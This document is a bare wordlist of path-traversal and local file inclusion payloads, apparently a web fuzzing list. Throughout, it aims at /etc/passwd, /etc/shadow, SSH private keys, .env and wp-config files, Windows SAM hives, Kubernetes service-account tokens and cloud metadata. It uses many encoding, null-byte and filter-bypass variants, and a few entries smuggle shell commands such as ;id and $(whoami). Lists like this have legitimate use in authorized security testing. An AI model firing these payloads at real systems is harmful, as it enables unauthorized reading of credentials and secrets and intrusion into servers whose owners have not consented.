../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd
..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5cetc%5cpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cpasswd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afpasswd
%e0%40%ae%e0%40%ae%c0%af%e0%40%ae%e0%40%ae%c0%afetc%c0%afpasswd
%c0%2e%c0%2e/%c0%2e%c0%2e/etc/passwd
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd
%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd
%u002e%u002e%u2216%u002e%u002e%u2216etc%u2216passwd
....//....//....//etc/passwd
....//....//etc/passwd
....\/....\/....\/etc/passwd
..././..././..././etc/passwd
..././..././etc/passwd
..\.\/..\.\/..\.\./etc/passwd
..//////..//////etc/passwd
..\\\\..\\\\etc\\passwd
..;/..;/..;/etc/passwd
..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/etc/passwd
...;/...;/...;/etc/passwd
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
../../etc/passwd%00.jpg
../../etc/passwd%00.png
../../etc/passwd%00.pdf
../../etc/passwd%00.txt
..%00/..%00/..%00/etc/passwd
./%00./.%00./etc/passwd
../../%00etc/passwd
..;/..;/..;/etc/passwd%00
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/hostname
/etc/issue
/etc/motd
/proc/self/environ
/proc/self/cmdline
/proc/version
file:///etc/passwd
file://etc/passwd
file:////etc/passwd
url:file:///etc/passwd
jar:file:///../../etc/passwd
../../windows/win.ini
../../../windows/win.ini
../../../../windows/win.ini
../../windows/system32/drivers/etc/hosts
c:\windows\win.ini
c:/windows/win.ini
\\localhost\c$\windows\win.ini
\\127.0.0.1\c$\windows\win.ini
\\.\c$\windows\win.ini
%5c%5clocalhost%5cc$%5cwindows%5cwin.ini
%5c%5c127.0.0.1%5cc$%5cwindows%5cwin.ini
..\/../..\/../..\/../etc/passwd
..\/..\/..\/etc/passwd
../\../\../\etc/passwd
..%2f..%5c..%2fetc%2fpasswd
../../Etc/Passwd
../../../ETC/PASSWD
../../../../eTc/pAsSwD
..%2F..%2FEtc%2FPasswd
../../etc/shadow
../../../etc/shadow
../../../../etc/shadow
../../etc/group
../../../etc/group
../../root/.ssh/id_rsa
../../../root/.ssh/id_rsa
../../root/.ssh/authorized_keys
../../home/user/.ssh/id_rsa
../../var/log/apache2/access.log
../../var/log/nginx/access.log
../../var/log/auth.log
../../var/log/syslog
../../proc/self/status
../../proc/net/tcp
../../proc/net/fib_trie
../../var/www/html/.env
../../.env
../../../.env
../../../../.env
../../wp-config.php
../../../wp-config.php
../../config.php
../../database.php
../../settings.php
../.git/config
../../.git/config
../../.git/HEAD
../../composer.json
../../package.json
../../web.config
../../.htaccess
../../index.php
../../config/database.yml
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%252e%252e%2f%252e%252e%2fetc%2fpasswd
%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fpasswd
..%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f..%2fetc%2fpasswd
%252e%252e/%252e%252e/etc/passwd
%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fpasswd
%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fpasswd
%2e%2e%u2215%2e%2e%u2215etc%u2215passwd
%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215etc%u2215passwd
%2e%2e;/%2e%2e;/etc;/passwd
%2e%2e%2f%c0%ae%c0%ae%2f..%2fetc%2fpasswd
%252e%252e%2f%c0%ae%c0%ae%2f..%2f%u002e%u002e%2fetc%2fpasswd
....//..%00/etc/passwd
%2e%2e;/%2e%2e;/etc;/passwd%00
%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%00etc%2fpasswd
..%20/..%20/etc/passwd
..%09/..%09/etc/passwd
..%0a/..%0b/etc/passwd
..%0d/..%0d/etc/passwd
..%0d%0a/..%0d%0a/etc/passwd
../../etc/passwd/
../../etc/passwd//
../../etc/passwd///
..%01/..%01/..%01/etc/passwd
../*/../*/etc/passwd
../../*/etc/passwd
..?/..?/etc/passwd
..~/..~/etc/passwd
/images/../../../etc/passwd
/static/../../etc/passwd
/assets/../../../etc/passwd
/uploads/../../etc/passwd
/tmp/../../../etc/passwd
/cache/../../etc/passwd
/api/v1/../../etc/passwd
../../proc/self/fd/0
../../proc/self/fd/1
../../proc/self/cwd
../../proc/self/exe
../../proc/self/maps
../../proc/net/arp
../../proc/net/route
../../proc/net/udp
../../windows/system32/config/sam
../../boot.ini
../../windows/repair/sam
../../windows/repair/system
../../inetpub/logs/LogFiles
../../inetpub/wwwroot/web.config
../../var/www/html/index.php
../../var/www/html/.htaccess
../../usr/local/apache2/conf/httpd.conf
../../application/config/database.php
../../config/credentials.yml.enc
../../index.php.bak
../../config.php.bak
../../.index.php.swp
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e/%2e%2e/%65tc/%70asswd
%2E%2e%2F%2e%2E%2fetC%2FPasSwD
%2e%2E%2f%2E%2e%2feTc%2fpAsSwD
..%2e/..%2e/etc/passwd
%2e./%2e./etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215passwd
%uFF0E%uFF0E%uFF0F%uFF0E%uFF0E%uFF0Fetc%uFF0Fpasswd
......///......///......///etc/passwd
....\\\....\\\....\\\etc\passwd
....//....//../....//../etc/passwd
........////........////etc/passwd
........\\\\........\\\\etc\\passwd
..../\/....\/\..../\/etc/passwd
../../windows/win.ini::$DATA
../../boot.ini::$DATA
../../windows/system32/config/sam::$DATA
../../WINDOW~1/SYSTEM~1/CONFIG/SAM
../../WINDOW~1/WIN.INI
../../sites/default/settings.php
../../configuration.php
../../settings.py
../../manage.py
../../node_modules/
%E3%80%82/%E3%80%82/%E3%80%82/etc/passwd
..%EF%BC%8F..%EF%BC%8Fetc%EF%BC%8Fpasswd
..%u202e/..%u202e/etc/passwd
..%u200B/%u200C/%u200Detc/passwd
%25%32%65%25%32%65%25%32%66etc%25%32%66passwd
%252525252525252e%252525252525252e%252525252525252fetc%252525252525252fpasswd
../../var/lib/php/sessions/sess_
../../var/lib/php5/sess_
../../tmp/sess_
../../var/log/mail.log
../../var/log/vsftpd.log
../../var/log/apache2/error.log
../../var/log/nginx/error.log
../../etc/mysql/my.cnf
../../etc/ssh/sshd_config
../../etc/apache2/apache2.conf
../../etc/nginx/nginx.conf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd
/icons/.%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
/icons/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
../../.dockerenv
../../var/run/docker.sock
../../proc/self/cgroup
../../proc/self/mountinfo
../../proc/self/mounts
../../var/run/secrets/kubernetes.io/serviceaccount/token
../../var/run/secrets/kubernetes.io/serviceaccount/ca.crt
../../var/run/secrets/kubernetes.io/serviceaccount/namespace
@169.254.169.254/../../proc/self/environ
@metadata.google.internal/../../etc/passwd
..%2f..%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f..%2f%2e%2e%2fetc%2fpasswd
..%2f%2e%2e%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fpasswd
%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fpasswd
%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fpasswd
%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fpasswd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
....\/....\/....\/....\/etc/passwd
..././..././..././..././etc/passwd
..\\../..\\../..\\../etc/passwd
..\/..\/..\../etc/passwd
..;/..;/..;/..;/..;/..;/etc/passwd
...;/...;/...;/...;/etc/passwd
../../etc/passwd%00%00
../../../etc/passwd%00%00
../../etc/passwd%00.html
../../etc/passwd%00.log
%00../etc/passwd
../%00../etc/passwd
../../etc%00/passwd
..%00/..%00/etc%00/passwd
\\localhost\c$\windows\system32\drivers\etc\hosts
\\localhost\admin$\system32\config\sam
\\127.0.0.1\c$\windows\system32\drivers\etc\hosts
\\.\c$\windows\system32\drivers\etc\hosts
\\localhost\c$\..\..\..\windows\win.ini
\\.\c$\..\..\windows\win.ini
%5c%5clocalhost%5cc$%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
%5c%5c.%5cc$%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
c:\windows\system32\drivers\etc\hosts
c:/windows/system32/drivers/etc/hosts
c:\windows\system32\config\sam
c:/windows/system32/config/sam
%2fetc%2fpasswd
%5cetc%5cpasswd
file:%2f%2f%2fetc%2fpasswd
url:http://127.0.0.1:8080/../../etc/passwd
..<>/..<>/..<>/etc/passwd
..*/..*/..*//etc/passwd
..&/..&/etc/passwd
..!/..!/etc/passwd
..`/..`/etc/passwd
..#/..#/etc/passwd
../../etc/passwd#
../../etc/passwd?query
..%09..%09..%09etc%09passwd
%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fpasswd
%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fpasswd
%252e%252e%u2215%252e%252e%u2215etc%u2215passwd
%252e%252e%u2215%c0%ae%c0%ae%2fetc%2fpasswd
..%2f..%2f%00etc%2fpasswd
%2e%2e%2f%00%2e%2e%2fetc%2fpasswd
%c0%ae%2e%u002e%252e/%c0%ae%2e%u002e%252e/etc/passwd
%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fpasswd
%2e%2e%u2215%c0%ae%c0%ae%2f..%2fetc%2fpasswd
....//....//etc/passwd%00
%2e%2e%2f%2e%2e%2f%00etc%2fpasswd
..%u2215..%u2215%00etc%u2215passwd
%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%00etc%2fpasswd
..;/..;/%00etc/passwd
....//....//etc/passwd%00.jpg
%252e%252e%u2215%c0%ae%c0%ae%2f....//etc%00/passwd
..%5c%00..%2f%c0%ae%c0%ae/etc/passwd
%2e%2e;/%2e%2e;/%00etc;/passwd
%2e%2e%2f%c0%ae%c0%ae%2f....//etc%00/passwd
../../../../../../tmp/evil.sh
../../../../../../../../tmp/evil.sh
../../../../../../../../../../tmp/evil.sh
../../../../../../var/www/html/shell.php
../../../../../../../../root/.ssh/authorized_keys
../../../../../../windows/system32/config/sam
..\\..\\..\\..\\..\\windows\\win.ini
..\\..\\..\\..\\windows\\system32\\config\\sam
../../index.php~
../../index.php.old
../../index.php.save
../../.index.php.swp
../../index.php.backup
../../config.php~
../../config.php.old
../../database.php.bak
../../wp-config.php.bak
../../.svn/entries
../../composer.json
../../package.json
../../web.config
../../autoexec.bat
../../config.sys
../../secret~1/
../../admin~1/
../../backup~1/
../../config~1.php/../../etc/passwd
../../databa~1.php/../../etc/passwd
../../CON
../../PRN
../../AUX
../../NUL
../../COM1
../../LPT1
../../etc/passwd;id
../../etc/passwd|whoami
../../etc/passwd`whoami`
../../etc/passwd$(whoami)
../../etc/passwd&&id
../../etc/passwd||id
../../169.254.169.254/latest/meta-data/
../../169.254.169.254/latest/user-data/
&period;&period;/&period;&period;/etc/passwd
&#46;&#46;/&#46;&#46;/etc/passwd
&#x2e;&#x2e;/&#x2e;&#x2e;/etc/passwd
%2e%2e%2f%2e%2e%2f%25%32%65%25%32%65%25%32%66etc%2fpasswd
%252525252e%252525252e%252525252fetc%252525252fpasswd
%2525252525252525252e%2525252525252525252e%2525252525252525252fetc%2525252525252525252fpasswd
．．／．．／etc／passwd
‥/‥/etc/passwd
··/··/etc/passwd
ｅｔｃ／ｐａｓｓｗｄ
../../../ｅｔｃ/ｐａｓｓｗｄ
..%5c..%2f..%5cetc%5cpasswd
%2e%2e%5c%2e%2e%2f%2e%2e%5cetc%5cpasswd
..\\../..\\/etc/passwd
../\\../\\../\\etc/passwd
..//\\..//\\..//\\etc/passwd
...\//.../\\.../\/etc/passwd
...\\/...\\/...\\/etc/passwd
%2e%2e%2f%2e%2e%5c%2e%2e%2fetc%2fpasswd
..%2f..%5c..%2f..%5cetc%2fpasswd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../Etc/Passwd
../../ETC/PASSWD
../../eTc/pAsSwD
../../EtC/PaSsWd
..%2F..%2F..%2FEtc%2FPasswd
%2E%2E%2f%2E%2E%2f%2E%2E%2fETC%2fPASSWD
..%2f..%2f..%2fETc%2fPASswd
../../etc/passwd%00.php
../../etc/passwd%00.asp
../../etc/passwd%00.aspx
../../etc/passwd%00.jsp
..%2f..%2f..%2fetc%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%2500
..;/..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/..;/..;/etc/passwd
%2e%2e;/%2e%2e;/%2e%2e;/etc;/passwd
%2e%2e;/%2e%2e;/%2e%2e;/%2e%2e;/etc;/passwd
/services/pluginscript/..;/..;/..;/getFavicon
/app/..;/..;/..;/etc/passwd
/api/..;/..;/..;/etc/passwd
/api/..;/..;/..;/..;/etc/passwd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
..%c0%9v..%c0%9vetc%c0%9vpasswd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cpasswd
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fpasswd
/(S(X))/admin/(S(X))/../../etc/passwd
/(G(AAA-BBB)D(CCC=DDD)E(0-1))/../../etc/passwd
/(A(; ))/../../etc/passwd
..//../..///..//etc//passwd
.....////.....////etc////passwd
....\\\....\\\etc\\\passwd
......///......///etc///passwd
..//////..//////..//////etc/passwd
..\\\\..\\\\..\\\\etc\\passwd
..\\\\\\\\..\\\\\\\\etc\\passwd
.../.../.../.../etc/passwd
...//...//../...//etc/passwd
